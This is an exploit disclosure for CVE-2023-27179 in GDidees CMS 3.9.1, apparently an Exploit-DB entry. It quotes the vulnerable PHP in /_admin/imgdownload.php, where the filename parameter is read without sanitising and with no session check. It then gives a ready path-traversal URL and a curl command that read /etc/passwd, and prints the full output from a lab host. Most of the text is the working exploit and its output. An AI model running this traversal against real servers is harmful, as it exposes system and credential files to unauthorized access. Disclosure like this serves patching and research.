# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure # Date : 03/27/2023 # Exploit Author : Hadi Mene # Vendor Homepage : https://www.gdidees.eu/ # Software Link : https://www.gdidees.eu/cms-1-0.html # Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179 ### Summary: GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php. ### Description : Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized. Furthermore, there is no admin session check in this code as it should since only the admin user should normally be able to download QR code. Vulnerable Code : 3. if (isset($_GET["filename"])) { 4. $filename=$_GET["filename"]; ..... ..... 27. @readfile($filename) OR die(); ### POC : URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd Exploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin ntp:x:104:110::/nonexistent:/usr/sbin/nologin messagebus:x:105:111::/nonexistent:/usr/sbin/nologin uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin vboxadd:x:998:1::/var/run/vboxadd:/bin/false openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179 https://nvd.nist.gov/vuln/detail/CVE-2023-27179 https://www.exploit-db.com/papers/12883